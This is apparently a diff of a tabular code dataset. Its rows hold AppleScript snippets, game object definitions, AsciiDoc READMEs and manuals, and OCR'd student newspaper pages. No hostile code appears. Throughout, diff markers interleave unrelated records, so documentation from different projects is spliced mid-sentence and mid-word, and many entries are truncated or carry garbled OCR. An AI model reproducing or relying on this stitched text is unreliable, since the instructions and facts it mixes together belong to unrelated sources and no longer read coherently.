+-- START OF CODE +-------------------- + +on fmGUI_ObjectClick_CancelButton(prefs) + -- version 1.1 + + try + return fmGUI_ObjectClick_Button({buttonName:""Cancel""} & prefs) + on error errMsg number errNum + error ""Unable to fmGUI_ObjectClick_CancelButton - "" & errMsg number errNum + end try +end fmGUI_ObjectClick_CancelButton + +-------------------- +-- END OF CODE +-------------------- + +on fmGUI_ObjectClick_Button(prefs) + tell application ""htcLib"" to fmGUI_ObjectClick_Button(prefs) +end fmGUI_ObjectClick_Button +","70","0.17326732673267325","0.0","0.0" +"111a9cac46e275a4a5b2feafdff1c8c2a8b83f4e","New-Snippet-From-Selection|Clipboard.applescript",".applescript","AppleScript","-- @ description +-- 1 shortcut to create from selection of keyboard +-- +-- @params none +-- @return none +tell application ""System Events"" + tell (first process whose frontmost is true) + if (menu item ""Copy"" of menu 1 of menu bar item ""Edit"" of menu bar 1) is enabled then + tell application ""Typinator"" to create from selection + else + tell application ""Typinator"" to create from clipboard + end if + end tell + return false +end tell +","70","0.17326732673267325","0.0","0.0" +"0c6bbe23cacd079155abee2a87c8f5e0dd803abf","Pushover to iPhone.applescript",".applescript","AppleScript","on handle_string(message) + do shell script ""~/Development/bash/commands/bin/pushover -m \"""" & message & ""\"" -t \""LaunchBar\"" -d \""iPhone\"""" +end handle_string +","70","0.17326732673267325","0.0","0.0" +"0defde9de5c95ae8725148a3fd922a54da10db58","doc-postgresql.applescript",".applescript","AppleScript","open location ""file:///Library/PostgreSQL/9.6/doc/postgresql/html/index.html"" +","70","0.17326732673267325","0.0","0.0" +"0bb2edd6751e3b252d754239e06b318554d6e4e9","202aed-0c9a-4578-bdd3-80d27b5ad3dd.scpt",".scpt","AppleScript","1358958648017:struct('lastvisit':createDateTime(2012,10,25,17,30,47,995,""Europe/London""),'hitcount':2,'timecreated':createDateTime(2012,10,25,17,30,47,995,""Europe/London""))","304","0.7524752475247525","0.0","0.0" +"09fa11da107d4d421f9109bfb828efdbf2d0c0c4","ba7ecb-4508-4d5b-a321-fd08b7e0b9b1.scpt",".scpt","AppleScript","1356346032143:struct('lastvisit':createDateTime(2012,9,25,11,47,12,142,""Europe/London""),'hitcount':3,'timecreated':createDateTime(2012,9,25,11,46,29,123,""Europe/London""))","304","0.7524752475247525","0.0","0.0" +"01e7976171185cb12ce7b18b5f303c39a32b3fdb","c93bac-1cc4-40a5-a687-f62a6f78bc10.scpt",".scpt","AppleScript","1356442601304:struct('lastvisit':createDateTime(2012,9,26,14,36,41,263,""Europe/London""),'hitcount':3,'timecreated':createDateTime(2012,9,26,14,35,56,208,""Europe/London""))","304","0.7524752475247525","0.0","0.0" +"1403fe4518a778c49bd41e3178e7a9eebe3bbe2c","e610a7-0f33-4a3a-be06-a1be3cc8d74b.scpt",".scpt","AppleScript","1355479295686:struct('lastvisit':createDateTime(2012,9,15,11,1,35,648,""Europe/London""),'hitcount':3,'timecreated':createDateTime(2012,9,15,11,1,14,187,""Europe/London""))","304","0.7524752475247525","0.0","0.0" +"095b2312c9ee8a5e22a370ad44e60845dbcd71a5","323877-aa54-4a05-b39e-843b5e43f2f6.scpt",".scpt","AppleScript","1359080075223:struct('lastvisit':createDateTime(2012,10,27,3,14,35,207,""Europe/London""),'hitcount':3,'timecreated':createDateTime(2012,10,27,3,14,28,509,""Europe/London""))","304","0.7524752475247525","0.0","0.0" +"08acd49e99bc38e59034aa74139746224061a95c","chair_bc_2.arc",".arc","Arc","Object chair_bc_2.1 +name chair +weight 50000 +face chair_bc_2.101 +value 1600 +material 16 +materialname satin covered wood +name_pl chairs +client_type 8002 +end + +Object chair_bc_2.2 +name chair +weight 50000 +face chair_bc_2.111 +value 1600 +material 16 +materialname satin covered wood +name_pl chairs +client_type 8002 +end + +Object chair_bc_2.3 +name chair +weight 50000 +face chair_bc_2.121 +value 1600 +material 16 +materialname satin covered wood +name_pl chairs +client_type 8002 +end + +Object chair_bc_2.4 +name chair +weight 50000 +face chair_bc_2.131 +value 1600 +material 16 +materialname satin covered wood +name_pl chairs +client_type 8002 +end +","70","0.875","0.0","0.0" +"01d11fd25910d93036c99827135294de7b4229ce","sorcerer_book.arc",".arc","Arc","Object sorcerer_book +name grimoire +name_pl grimoires +face sorcerer_book.111 +type 85 +skill literacy +material 1 +value 20 +weight 5000 +editable 2048 +magicmap brown +nrof 1 +client_type 1001 +randomitems sorcery_book +end +# +# Starting spellbooks for sorcerers. +# +Object sorcerer_book_l1 +name grimoire +name_pl grimoires +face sorcerer_book.111 +type 85 +skill literacy +material 1 +value 20 +weight 5000 +editable 2048 +magicmap brown +nrof 1 +client_type 1001 +randomitems sorcery_l1 +end +","70","0.875","0.0","0.0" +"011938fb6c64a59f49db05a46c86efb76d390bc1","barmaid.arc",".arc","Arc","Object barmaid +name barmaid +race human +type 80 +layer 6 +behavior 2 +direction 5 +wc_range 20 +is_female 1 +is_good 1 +terrain_flag 1 +weapon_speed 0.055 +corpse 1 +attack_weaponmagic 100 +face barmaid.131 +animation barmaid +is_animated 1 +anim_speed 4 +speed -0.047 +alive 1 +monster 1 +Wis 4 +see_invisible 1 +protect_impact 75 +protect_cleave 75 +protect_pierce 75 +protect_slash 75 +protect_magic 100 +no_pick 1 +reflect_missile 1 +reflect_spell 1 +Con 15 +exp 100 +hp -1 +maxhp 100 +Pow 3 +ac 12 +wc 6 +dam 100 +level 1 +weight 85000 +friendly 1 +unaggressive 1 +Str 25 +end +","70","0.875","0.0","0.0" +"0c85a76e49fb3144d3e571bbc20c664ed87ee997","jelly_blue.arc",".arc","Arc","Object jelly_blue +name blue jelly +race slime +randomitems mob_slime +is_neutral 1 +weight 13250 +exp 101 +wc_range 20 +speed -0.05 +weapon_speed 0.040 +attack_cold 75 +protect_poison 100 +protect_paralyze 100 +ac 10 +wc 2 +dam 60 +hp -1 +maxhp 60 +terrain_flag 1 +Wis 3 +can_see_in_dark 1 +face blue_jelly.111 +animation jelly_blue +is_animated 1 +anim_speed 4 +type 80 +layer 6 +direction 5 +corpse 1 +monster 1 +no_pick 1 +alive 1 +level 1 +end +","70","0.875","0.0","0.0" +"0831f0686a4e2c9b8c283b14bc751bbc7fe42fde","childf3.arc",".arc","Arc","Object childf3 +name child +race human +type 80 +layer 6 +behavior 10 +direction 5 +wc_range 20 +is_female 1 +is_good 1 +terrain_flag 65 +weapon_speed 0.038 +corpse 1 +attack_slash 80 +face childf3.131 +animation childf3 +is_animated 1 +anim_speed 4 +speed -0.047 +monster 1 +item_power 6 +no_pick 1 +exp 89 +hp -1 +maxhp 60 +ac 7 +wc 3 +dam 44 +level 1 +weight 46000 +faction npcs +int 15 +end +","70","0.875","0.0","0.0" +"0ee69faed7ca16ccfd0fe4f1acab1a2c44b86719","macrodef.adoc",".adoc","AsciiDoc"," +This page has moved. If your browser doesn't automatically redirect to its new location, click +link:../settings/macrodef.html[here]. + ","2677","0.7931851851851852","0.0","0.0" +"0a35ca025f8abc673f881443e5eac5e6f433c856","PublisingNotes.adoc",".adoc","AsciiDoc","== Publishing to Maven Central + +The released artifacts are published to Maven central via Sonatype repository, the details of how the priveleges were obtained is http://central.sonatype.org/pages/ossrh-guide.html[here] + +To release from your desktop first add the credentials related to Sonatype(ossrh) in a gradle.properties file in your ~/.gradle directory, +note that this should be totally private to your machine and should never be shared. + +[source] +---- +signing.keyId=GPG_KEY_ID +signing.password=GPG_PASSEORD +signing.secretKeyRingFile=Signing Key Ring.. + +ossrhUsername=user +ossrhPassword=password +---- + +If all of the above is cleanly set, the artifact can be published using the command: + +[source] +---- +./gradlew uploadArchives +./gradlew publishPlugins # for gradle plugins site.. +---- + +It takes about 10 mins before the artifacts are visible via maven and 2 hours before it is searchable. + + +== For versioned releases: -== Using the Default JMX Support Agent +* go https://oss.sonatype.org/#stagingRepositories[here] +* search for comgi","2677","0.7931851851851852","0.0","0.0" +"07fd12c3a4fd6b41ac01df74cbb49453c4ea7bb9","README.adoc",".adoc","AsciiDoc","= OptaWeb Vehicle Routing -You can configure several JMX age","2718","0.7841892671667628","0.0","0.0" -"178dbe5db2ecc935c3f610ccccc8f98a0f590738","main.adoc",".adoc","AsciiDoc",":version: 4.0.0 RC2 -:techversion: 4.0.0-RC2 +image:https://travis-ci.com/kiegroup/optaweb-vehicle-routing.svg?branch=master[ +""Build Status"", link=""https://travis-ci.com/kiegroup/optaweb-vehicle-routing""] -= Oxalis -v{version} -:doctype: book -:icons: font -:toc: left -:toclevels: 2 -:source-highlighter: coderay -:source-language: xml -:sectanchors: -:sectnums: +Web application for solving the https://www.optaplanner.org/learn/useCases/vehicleRoutingProblem.html[Vehicle Routing Problem] +using https://www.optaplanner.org/[OptaPlanner]. -:leveloffset: +1 +== Running the Application -include::introduction.adoc[] +First, clone this repository and `cd` into it. -include::install.adoc[] +Frontend and backend are built and run independently. Open two terminal windows. -include::configuration.adoc[] +== Run Frontend -include::customizing.adoc[] -","2718","0.7841892671667628","0.0","0.0" -"13bc1288977cf71dc45147b004584c9d9e3391b9","_rgsvc_api_ServiceRegistry.adoc",".adoc","AsciiDoc","[[_rgsvc_api_ServiceRegistry]] -= `ServiceRegistry` (`1.12.0-SNAPSHOT`) -:Notice: Licensed to the Apache Software Foundation (ASF) under one or more contributor license agreements. See the NOTICE file distributed with this work for additional information regarding copyright ownership. The ASF licenses this file to you under the Apache License, Version 2.0 (the ""License""); you may not use this file except in compliance with the License. You may obtain a copy of the License at. http://www.apache.org/licenses/LICENSE-2.0 . Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an ""AS IS"" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. -:_basedir: ../ -:_imagesdir: images/ +. Install `npm`. If you're on Fedora, you can do this by running: ++ +[source,shell] +---- +sudo dnf install npm +---- + +. Install dependencies: ++ +[source,shell] +---- +cd optaweb-vehicle-routing-frontend +npm install +---- +. Run frontend: ++ +[source,shell] +---- +npm start +---- -The `ServiceRegistry` service collects together methods for accessing other domain services. +. Open http://localhost:3000/ -[NOTE] +[TIP] +.Prevent `npm start` from launching your default browser ==== -The methods in this servi","2718","0.7841892671667628","0.0","0.0" -"1c8fa3047ad5fea2612718fc50bda77c6be5b846","color_chooser.adoc",".adoc","AsciiDoc"," -[[color_chooser]] -==== color_chooser -[small]#Rfr: link:++http://www.fltk.org/doc-1.3/classFl__Color__Chooser.html++[Fl_Color_Chooser]. + -Inherits from: <>, <>.# +If you don't want `npm start` to open a new browser tab each time you run it, +export an envir","2677","0.7931851851851852","0.0","0.0" +"011d98714fcd6da96136ded67e9381492dc7413f","README.adoc",".adoc","AsciiDoc","= beer-garden.io -* _color_chooser_ = *fl.color_chooser*(_x_, _y_, _w_, _h_, [_label_]) +The documentation for +https://github.com/beer-garden/beer-garden/[beer-garden] +project. Composed in AsciiDoc, styled by Bootstrap, baked with Awestruct and +published by Github Pages. -* _hue_ = *:hue*( ) + -* *:mode*(<>) + -<> = *:mode*( ) +For instructions on how to install Awestruct and its dependencies, refer to +the section xref:install-awestruct[Install Awestruct] below. -* _r_ = *:r*( ) + -_g_ = *:g*( ) + -_b_ = *:b*( ) +== Preview the site locally -* _boolean_ = *:rgb*(_r_, _g_, _b_) +To preview the site locally, simply run the default rake build task: -* _saturation_ = *:saturation*( ) + rake -* _brightness_ = *:value*( ) +The default rake build task is +preview+, so you're effectively typing: + rake preview -//@@ aggiungere link a hsv2rgb e rgb2hsv (spostate in flcolor.cc) +the +preview+ task is just a short way of invoking Awestruct in development +mode directly: -","2718","0.7841892671667628","0.0","0.0" -"00afd22689f0d702fc960130f6a064263078b443","GoXo.asc",".asc","AsciiDoc","= FEATURE: Brainquest riddle 13 + awestruct -d --source-dir source --output-dir public -[.step-list] -* As logged-in user at http://www.bqbi.net/[BrainQuest] -* I want to solve the challenge http://www.bqbi.net/en/riddles/13[riddle13] +Now visit http://localhost:4242 to preview the site -== Background: +To rebuild the site from a clean state, pass the +--force+ flag to the +preview+ +task: -[.step-list] -* *Given* A nice picture + rake preview[--force] -=== Scenario: name of this place -[.step-list] -* *Given* A title: Ming -* *When* I realize that this sacred place is located in Beijing, China -* *Then* I should find the solution to this challenge -","156","0.04500865551067513","0.0","0.0" -"0367996fdf2ad8bf01e0149aef282befe863a656","toxic.1.asc",".asc","AsciiDoc","toxic(1) -======== +You can pass any flag through to Awestruct using the syntax in the previous +command. + +If you just want to generate the site, run: + + rake gen + +=== Ad","2677","0.7931851851851852","0.0","0.0" +"09747b78ff6d160238b6e6b46205c8ee5e0db8fe","trap-bug1.sh.adoc",".adoc","AsciiDoc","trap-bug1.sh(1) +=============== +:compat-mode!: NAME ---- -toxic - CLI client for Tox +trap-bug1.sh - a shell script SYNOPSIS -------- -*toxic* [-f 'data-file'] [-x] [-4] [-c 'config-file'] [-n 'nodes-file'] [-h] +Documentation automatically generated with `zshelldoc' -DESCRIPTION ------------ -toxic is an ncurses-based instant messaging client for Tox which formerly -resided in the Tox core repository, and is now available as a standalone -application. +FUNCTIONS +--------- + + set_dollar_question -OPTIONS +DETAILS ------- --4, --ipv4:: - Force IPv4 connection --b, --debug:: - Enable stderr for debugging. Redirect output to - avoid breaking the curses interface and better capture messages. +Script Body +~~~~~~~~~~~ + +Has 5 line(s). Calls functions: --c, --config config-file:: - Use specified 'config-file' instead of '~/.config/tox/toxic.conf' + Script-Body + `-- set_dollar_question --d, --default-locale:: - Use default locale +Uses feature(s): _trap_ --e, --encrypt-data:: - Encrypt an unencrypted data file. An error will occur if this option - is used with an encrypted data file. +set_dollar_question +~~~~~~~~~~~~~~~~~~~ --f, --file data-file:: - Use specified 'data-file' instead of '~/.config/tox/toxic_profile.tox' +____ + #!/bin/zsh -f + # Tests for $? not set properly inside trap DEBUG. +____ --h, --help:: - Show help message +Has 1 line(s). Doesn't call other functions. --l, --logging:: - Enable toxcore logging to stderr +Called by: -","156","0.04500865551067513","0.0","0.0" -"10ff82ad822ee36de0b292d2267c64f7628e40cf","README.asc",".asc","AsciiDoc","= README -Tzvetan Mikov + Script-Body -== cfe99 +","2677","0.7931851851851852","0.0","0.0" +"0666c86bc529191e03e250b378be0a3895517ff0","samarium_gds36.19819.asc",".asc","AsciiDoc","USGS Digital Spectral Library splib06a +Clark and others 2007, USGS, Data Series 231. -An unfinished C99 front-end written in C circa 2003. +For further information on spectrsocopy, see: http://speclab.cr.usgs.gov +ASCII Spectral Data file contents: +line 15 title +line 16 history +line 17 to end: 3-columns of data: + wavelength reflectance standard deviation -== License +(standard deviation of 0.000000 means not measured) +( -1.23e34 indicates a deleted number) +---------------------------------------------------- +Samarium Oxide GDS36 W5R4Naa_ RREF +copy of spd0300 r 3788 + -1.23e34 -1.23e34 -1.23e34 + -1.23e34 -1.23e34 -1.23e34 + -1.23e34 -1.23e34 -1.23e34 + -1.23e34 -1.23e34 -1.23e34 + -1.23e34 -1.23e34 -1.23e34 + -1.23e34 -1.23e34 -1.23e34 + -1.23e34 -1.23e34 -1.23e34 + -1.23e34 -1.23e34 -1.23e34 + -1.23e34 -1.23e34 -1.23e34 + -1.23e34 ","155","0.045925925925925926","0.0","0.0" +"0f49e805b14a56f689bb42045a543b4c52b0b5a0","README.asc",".asc","AsciiDoc","= Check for updates -Licensed udner GPL v2. See COPYING. -It uses ""Cocom/Ammunication"" which is licensed under LGPL v2. -See +cocom/ammunition/COPYING.LIB+. -","156","0.04500865551067513","0.0","0.0" -"18f15f88e0ad6952a480ef6eac959fc5da7ed90a","pitt_31735068353238_OCR.asc",".asc","AsciiDoc"," +This solution check for updates in a Debian/Ubuntu server and send an email if there are some updates. - + +== How to install the solution + +Clone the repo + +[source,] +---- +$ git clone https://github.com/amieiro/check-for-updates.git +---- + +Run the composer installation +[source,] +---- +$ cd check-for-updates +$ composer install +---- + +Create the configuration file +[source,] +---- +$ mv .env.example .env +---- + +Complete the configuration file (.env file) with your own information, using a text editor +[source,] +---- +# SMTP server +MAIL_HOST=smtp.example.com +# Enable or disable SMTP authentication +SMTP_AUTH=true +# SMTP username +MAIL_USERNAME=info@example.com +# SMTP password +MAIL_PASSWORD=examplePassword +# Enable TLS or SSL encryption +MAIL_ENCRYPTION=tls +# TCP port to connect to +MAIL_PORT=587 +# Mail from address +MAIL_FROM_ADDRESS = info@example.com +# Mail from name +MAIL_FROM_NAME = ""Server Updates"" +# Recipient mail +MAIL_TO_ADDRESS = info@example.com +# Server name where you will c","155","0.045925925925925926","0.0","0.0" +"1477477bf5a1090bca8d2c5108538637836dd07a","Skhorn.asc",".asc","AsciiDoc","= FEATURE: BrainQuest Riddle 30 + +[.step-list] +* Logged-in at http://www.bqbi.net/en/info[BrainQuest] +* To solve the challenge http://www.bqbi.net/en/riddles/30[Riddle 30] + +== Background: + +[.step-list] + +* *Given* an image + +=== Scenario: Name of the place + +[.step-list] +* *Given* the title: Was here, dan + +* *When* i look at the place, i realize it is related with a large plaza at the vatican city. + +* *Then* i got the solution +","155","0.045925925925925926","0.0","0.0" +"019ab8fa15de593a9d9aad43640262c9daecf6b5","pitt_31735062156488_OCR.asc",".asc","AsciiDoc"," -cl. XX. No. 5 +voL_. 46.—No. 41 - +THE UNIVERSITY or PITTSBURGH + +FR_I., APRIL 24, 1953 + +S4000 High School Pupils Here -419 + . . 33/. win nmmvncnnnii +. g V’ - Singers,speakers, and instrumentalists will hold the cen- +‘ -ter of the Oakland stages for the remaining sessions of the -f MINE. MILL and SMELTER WORKERS -o-Q JD 3 .' ' "" V ' +Pennsylvania Forensic and Music League finals, todayand, +°.tomorrow. - -Convention P + Hill City Tour Ends + YWCA Program , - Backs Hike - In Per Cap +_ By ELINDRE STONE +A tour on May 7 to Hill City, one of the Pittsburgh’s +7 unique organizations, will end this year’s jointly—sponsored +tours’ program of the University’s YW & YMCA. - -TUCSON, Ariz.——Backed by - overwhelming support of - .the 56th Mine-Mill convention +Those on the tour will see Hill City in action, sitting +andés - --7 h7e_re,""‘ a constitutional"" amend- +eague Finals /7 -' ment on per capita to place the + Far Eastern -_. union on a more sound fi- +pi Study Maj or -. "" nancial footing will be sub- +Announced — -mitted for national referendum +Dr. James T. C. Liu has an- -.. A vote of the membership on -‘ ” Tuesday, May 16. C‘ +nounced that, after tvy__q_yea.rs«of- -. In approving the proposed - amendment, the delegates - 4. acted almost unanimously on a -master resolution concurred in -by the convention’s constitu- - tion comniittee which had be- -fore it 53 resolutions from as -“ ""many separate locals urging -. an increase in per capita to the +development, an’ interdepartment- +all major in Far Eastern Studies +.Will' be made available to Pitt stu- +dents. -- -- International union. +- The aim of ‘the program is to +train college graduates for imme- +diate public service. Placement of +graduates is assured fo","155","0.045925925925925926","0.0","0.0" +"06e5e9fc149037e0927558056d04f03a63595be8","pitt_31735062159029_OCR.asc",".asc","AsciiDoc","_ presidents last month, and the plan -The traditionally democratic -referendum on May 16 will -also involve the election of In- +A-\.__ + +Headlines... + +Women’s Fraternities +Urged To Adopt +i Membership Regulation -. , ternational officers and Execu- -* . tive Board members from the -. ""districts. (See separate story - on Page 9 and candidates’ state- -’-‘ - ments on Pages 7, 8 and 9.),","156","0.04500865551067513","0.0","0.0" -"00cfd208f21ec45115f0d8b7a3377d020805bfce","pitt_31735066024617_OCR.asc",".asc","AsciiDoc"," - -O’Connor dedicates -new computer lab +OFFICIAL STUDE -By Dan Darragh -Staff Writer +he Pitt News -Pitt President J. Dennis O’Connor dedicated a new -computer lab that will train state educational -administrators and hopefully improve the quality of -Pennsylvania’s education last night in Forbes -Quadrangle. +NT T RI-WEEKLY PUBLICATION OF THE UNIVERSITY OF PITTSBURGH -IBM Corporation donated $560,000 worth of computer -equipment and software to the lab, which is located in -room SPS6 of Forbes Quad. The lab is part of the -Department of Administrative and Policy Studies in -Pitt’s School of Education. +By MARION CONN -“More schools are now investing in computers, but -not all administrators know how to make the fullest use -of them,” said Dr. William W. Cooley, director of the -lab. +Volume XXIX Z653 -“This lab will train school administrators in the use -of modern information technology. They will learn -how tea use programs that manage information about -students, school budgets and state regulations,” Cooley -said. _ * +PITTSBURGH, PENNSYLVANIA, WEDNESDAY, JANUARY 12, 1938 -“An administrator can become inefficient by not -keeping up-to—date with current information. He","156","0.04500865551067513","0.0","0.0" -"0d6dc311e0dc717ba3179e3bf47d896f72dde09b","Chapter-3.asciidoc",".asciidoc","AsciiDoc","== Juno: A Solid Propellant Rocket - -.Juno -image::images/Fig%203-1.jpg[] - -This rocket is a workhorse, easy to build but very stable. It's also capable of reaching altitudes of 1500 feet—over a quarter of a mile! - -.What's in a Name? -**** -Names for rockets, both model rockets and big NASA rockets, range from serious to whimsical. The Apollo 11 lunar module that first landed on the Moon carried the classy moniker of Eagle, leading to those first words from the moon: ""Houston, Tranquility Base here. The Eagle has landed!"" Apollo 10's lunar module had the fun name of Snoopy. - -Like all of the rockets in this book, Juno is named after an asteroid. German astronomer Karl Harding discovered the asteroid in 1804. It's about 200 miles/320 meters across at its widest point, but isn't round. In another direction, it's only about 2/3 that size. Its orbit is fairly irregular, too. Juno's _perihelion_ (closest point to the Sun) is about twice as far as Earth's orbit, while its _aphelion_ (fa","576","0.1661858049624928","0.0","0.0" -"039c3b06054ee898138bb6036fead2e5d7f000c2","README.asciidoc",".asciidoc","AsciiDoc","This layered package installs above a baseline package -to configure the host as a graphical workstation. -","576","0.1661858049624928","0.0","0.0" -"07b524db7a5f7220f04ddc4a39d6800de0ad2832","docs.asciidoc",".asciidoc","AsciiDoc",":modulename: postgresql +K: + +Number 42 -== PostgreSQL module + -The +{modulename}+ module collects and parses logs created by -https://www.postgresql.org/[PostgreSQL]. +hi the last few weeks, a rein- +carnation oi’ an old plan to limit. +the niembersliip of womt-.11’s so- +cial t‘raternit.ies has appeared +on the Universit_v canipus. + +At: various intervals tl1rou;2:li- +out the past decade attempts have +been made to put the plan into ef- + +fect here, but all efforts have +failed’ consistently. Now the Na- +tional Panhellenic Congress is + +making its first official move in an +attempt to have their plan ap- +proved and adopted immediately +by women’s fraternities all over +the country. + +Letters explaining the reorgan- +ization were sent to fraternity + +has been presented and discussed +at meetings of the local chapters. + +Now the question is pending, +“W","155","0.045925925925925926","0.0","0.0" +"0ae0ff896584510b36fa79c5133dc6b312843794","type_system.asciidoc",".asciidoc","AsciiDoc","[[CH-TypeSystem]] +== The Erlang Type System and Tags + +One of the most important aspects of ERTS to understand is how ERTS +stores data, that is, how Erlang terms are stored in memory. This +gives you the basis for understanding how garbage collection works, +how message passing works, and gives you an insight into how much +memory is needed. + +In this chapter you will learn the basic data types of Erlang and +how they are implemented in ERTS. This knowledge will be essential +in understanding the chapter on memory allocation and garbage +collection, see xref:CH-Memory[]. + +=== The Erlang Type System + +Erlang is _strongly typed_. That is, there is no way to coerce one +type into another type, you can only convert from one type to another. +Compare this to e.g. C where you can coerce a _char_ to an _int_ or +any type pointed to by a pointer to (_void *_). + +The Erlang type lattice is quite flat, there are only a few real sub +types, numbers have the sub types integer and float, an","541","0.1602962962962963","0.0","0.0" +"0a9f98d6547ebeadc0f7f9d69035e993fb2acb71","charts-installing.asciidoc",".asciidoc","AsciiDoc","--- +title: Installing Vaadin Charts +order: 2 +layout: page +--- -include::../include/what-happens.asciidoc[] +[[charts.installing]] += Installing Vaadin Charts -[float] -=== Compatibility +As with most Vaadin add-ons, you can install Vaadin Charts as a Maven or Ivy +dependency in your project, or from an installation package. For general +instructions on installing add-ons, please see +<>. -The +{modulename}+ module was tested with logs from versions 9.5 on Ubuntu and 9.6 -on Debian. +Vaadin Charts 4 requires Vaadin 8. -include::../include/running-modules.asciidoc[] +Using Vaadin Charts requires a license key, which you must install before +compiling the widget set. The widget set must be compiled after setting up the +dependency or library JARs. -[float] -=== Example dashboards +For instructions on installing a license key, see <>. -This module comes with two sample dashboards. +[[charts.installing.maven]] +== Maven Dependency -The first dashboard is for regular logs. +The Maven dependency for Vaadin Charts is as follows: -[role=""screenshot""] -image::./images/filebeat-postgresql-overview.png[] +[subs=""normal""] +---- +<dependency> + <groupId>com.vaadin</groupId> + <artifactId>va","541","0.1602962962962963","0.0","0.0" +"0f7d98afa6e4c5496cc0b9ed93b784f3d0895763","tophits-aggregation.asciidoc",".asciidoc","AsciiDoc","[[search-aggregations-metrics-top-hits-aggregation]] +=== Top hits Aggregation -The second one shows the slowlogs of PostgreSQL. +A `top_hits` metric aggregator keeps track of the most relevant document being aggregated. This aggregator is intended +to be used as a sub aggregator, so that the top matching documents can be aggregated per bucket. -[role=""screenshot""] -image::./images/filebeat-postgresql-slowlog-overview.png[] +The `top_hits` aggregator can effectively be used to group result sets by certain fields via a bucket aggregator. +One or more bucket aggregators determines by which properties a result set get sliced into. -include::../include/configuring-intro.asciidoc[] +==== Options -The following example shows how to set paths in the +modules.d/{modulename}.yml+ -file to override the default paths for PostgreSQL logs: +* `from` - The offset from the first result you want to fetch. +* `size` - The maximum number of top matching hits to return per bucket. By default the top three matching hits are returned. +* `sort` - How the top matching hits should be sorted. By default the hits are sorted by the score of the main query. +==== Supported per hit features -[""source"",""yaml"",subs=""attributes""] ------ -- module: postgresql - log: - enabled: true - var.paths: [""/path/to/log/pos","576","0.1661858049624928","0.0","0.0" -"131c06526f7994fc1bae31cc3f253de2b521e41d","configuration_thermostat.asciidoc",".asciidoc","AsciiDoc"," -Pour etre reconu par le plugin, le AllOne doit déjà etre configuré sur votre réseau wifi. +The top_hits aggregation returns regular search hits, because of this many per hit features can be supported: -voici comment procéder : +* <> and <>. -// end::notable-breaking-changes[] +[discrete] +[[restore-snapshot-prereqs]] +=== Prerequisites -[float] -[[all-meta-field-removed]] -==== The `_all` meta field is removed +include::register-repository.asciidoc[tag=kib-snapshot-prereqs] -The `_all` field deprecated in 6 have now been removed. +include::apis/restore-snapshot-api.asciidoc[tag=restore-prereqs] -[float] -[[uid-meta-field-removed]] -==== The `_uid` meta field is removed +[discrete] +[[restore-snapshot-considerations]] +=== Considerati","541","0.1602962962962963","0.0","0.0" +"08cd8ca5324e3cfbca25f4d91946471660c1c119","linux-faq.txt",".txt","AsciiDoc","[[cha:linux-faq]] -This field used to index a composite key formed of the `_type` and the `_id`. -Now that indices cannot have multiple types, this has been removed in favour -of `_id`. += Linux FAQ -//tag::notable-breaking-changes[] -[float] -[[default-mapping-not-allowed]] -==== The `_default_` mapping is no longer allowed +These are some basic Linux commands and techniques for new to Linux +users. More complete information can be found on the web or by using +the man pages. -The `_default_` mapping has been deprecated in 6.0 and is now no longer allowed -in 7.0. Trying to configure a `_default_` mapping on 7.x indices will result in -an error. -//end::notable-breaking-changes[] +== Automatic Login -[float] -[[index-options-numeric-fields-removed]] -==== `index_","576","0.1661858049624928","0.0","0.0" -"07f7972654d02f677e6cfd27d46aee503ad88cfd","adding-packages-perl.txt",".txt","AsciiDoc","// -*- mode:doc; -*- -// vim: set syntax=asciidoc: +When you install LabvCNC with the Ubuntu LiveCD the default is to have to +log in each time you turn the computer on. To enable automatic login go +to 'System > Administration > Login Window'. If it is a fresh install the +Login Window might take a second or three to pop up. You will have to +have your password that you used for the install to gain access to the +Login Window Preferences window. In the Security tab check off Enable +Automatic Login and pick a user name from the list (that would be you). -=== Infrastructure for Perl/CPAN packages - -[[perl-package-tutorial]] - -==== +perl-package+ tutorial - -First, let's see how to write a +.mk+ file for a Perl/CPAN package, -with an example : - ------------------------- -01: ################################################################################ -02: # -03: # perl-foo-bar -04: # -05: ################################################################################ -06: -07: PERL_FOO_BAR_VERSION = 0.02 -08: PERL_FOO_BAR_SOURCE = Foo-Bar-$(PERL_FOO_BAR_VERSION).tar.gz -09: PERL_FOO_BAR_SITE = $(BR2_CPAN_MIRROR)/authors/id/M/MO/MONGER -10: PERL_FOO_BAR_DEPENDENCIES = perl-strictures -11: PERL_FOO_BAR_LICENSE = Artistic or GPL-1.0+ -12: PERL_FOO_BAR_LICENSE_FILES = LICENSE -13: -14: $(eval $(perl-package)) ------------------------- - -On line 7, we declare the version of the package. - -On line 8 and 9, we declare the name of the tarball and the location -of the tarball on a CPAN server. Buildroot will automa","14","0.004039238315060588","0.0","0.0" -"00dc40ea4b80dd3e152a1193a61fb9daa4a215e1","utlist.txt",".txt","AsciiDoc","utlist: linked list macros for C structures +== Automatic Startup + +To have LabvCNC start automatically with your config after turning on the +computer go to 'System > Preferences > Sessions > Startup Applications', +click Add. Browse to your config and select the .ini file. When the file +picker dialog closes, add labvcnc and a space in ","16","0.004740740740740741","0.0","0.0" +"12e7999a4ca6ca08341ea3af3e4e242379decae4","objfmt-macho32.txt",".txt","AsciiDoc","[[objfmt-macho32]] +== `macho32`: Mach 32-bit Object File Format + +indexterm:[`macho`,`macho32`] +indexterm:[Mach-O] +indexterm:[Mac OSX] + +// vim: set syntax=asciidoc sw=2 tw=70: +","16","0.004740740740740741","0.0","0.0" +"07a3fe72264ef935f8d0cf7946a872d91b121f4d","utlist.txt",".txt","AsciiDoc","utlist: linked list macros for C structures =========================================== Troy D. Hanson -v2.0.2, March 2017 +v2.0.1, July 2016 Here's a link back to the https://github.com/troydhanson/uthash[GitHub project page]. @@ -5506,891 +6010,671 @@ It is free and open source. Platforms ~~~~~~~~~ -The 'utlist' macros have be","14","0.004039238315060588","0.0","0.0" -"132f664844fb438ab5d00f5f3b9a71194df5082b","overview_fr.txt",".txt","AsciiDoc",":lang: fr -:toc: - -= Vue générale du langage G-codes de LinuxCNC - -[[cha:Vue-generale-G-code]] (((Vue générale du G-code de LinuxCNC))) - -:ini: {basebackend@docbook:'':ini} -:hal: {basebackend@docbook:'':hal} -:ngc: {basebackend@docbook:'':ngc} -// begin a listing of ini/hal/ngc files like so: -//[source,{ini}] -//[source,{hal}] -//[source,{ngc}] - -== Brève description du G-code de LinuxCNC - -Le G-code est le langage de programmation des machines numériques. Le G-code -utilisé par LinuxCNC est basé sur le langage RS274/NGC. Cette documentation 